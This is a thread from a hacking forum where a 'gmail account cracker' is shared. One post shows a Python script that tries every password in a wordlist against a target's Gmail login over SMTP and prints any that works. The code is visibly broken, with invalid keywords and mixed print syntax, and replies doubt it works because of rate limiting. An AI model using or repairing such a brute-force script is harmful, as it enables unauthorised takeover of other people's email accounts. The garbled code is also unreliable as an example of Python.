Python - gmail account cracker 01-18-2018, 08:00 PM
#1
The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.
| Leak Python - gmail account cracker filter_list | |
RE: Python - gmail account cracker 01-18-2018, 08:07 PM
#2
Spoiler: This is the code from the download
Code:
imports smtplib
imports argparse
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target", help="Target")
parser.add_argument("-f", "--file", help="Password File")
args = parser.parse_args()
stop = False
if args.target and args.file:
  stop = True
  printf "Gmail Account Cracker"
  passwordfile = open(args.file, "r")
  for line in passwordfile:
      print "Attempted Password: '+line
      server = smtplib.SMTP('smtp.gmail.com:587')
      server.starttls()
      try:
        server.login(args.target, line)
        print '[!] Password: '+line
        a = raw_input()
        exit()
      except smtplib.SMTPAuthenticationError:
        pass
if '__main__' == __name__:
  if stop == False:
      printf 'Error, correct syntax: python script.py -t <target> -f <passfile>'For some reason, I feel like this wouldn't work as I feel that Google would start refusing your connections after a certain point.
That aside, oh dear god, is that really Python?
Quote:printf "Gmail Account Cracker"
Edit: I know Python3 which is why I am even asking... I've never even seen printf used in python2 that I know of.....
(This post was last modified: 01-18-2018, 08:07 PM by Synthx.)
![[Image: ezgif_com_gif_maker.gif]](http://image.ibb.co/jc44HH/ezgif_com_gif_maker.gif)
#yellowheartsforsarah
RE: Python - gmail account cracker 02-25-2018, 08:36 PM
#3
i want to learn it where i can start it i dont know any thing about coding
Free Bitcoin Here :- https://freebitco.in/?r=1101634
RE: Python - gmail account cracker 02-25-2018, 09:08 PM
#4
Didn't check but it's unlikely that it would w3rk. It's python:!!
Quote:def printf(format, *values):
 print(format % values )
RE: Python - gmail account cracker 02-26-2018, 07:01 AM
#5
(02-25-2018, 08:36 PM)karansudhi Wrote: i want to learn it where i can start it i dont know any thing about coding
To remain on-topic, I suggest you create a thread.
As such, members can address all questions and concerns.
RE: Python - gmail account cracker 03-11-2018, 03:56 PM
#6
Google definitely checks how many requests you send to their login page. Thats why hydra attacks never work because Google sends a fake "correct" response to your attempt.
RE: Python - gmail account cracker 03-14-2018, 12:02 PM
#7
Had anyone tried using this tool? And does it actually work?
RE: Python - gmail account cracker 04-24-2018, 05:04 PM
#8
Dude you should study about rate limiting. Bruteforce tools dont work at all nowdays on top level domains like gmail or facebook. If you want to know why they dont work then study about rate limiting.
Users browsing this thread: 1 Guest(s)
![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)












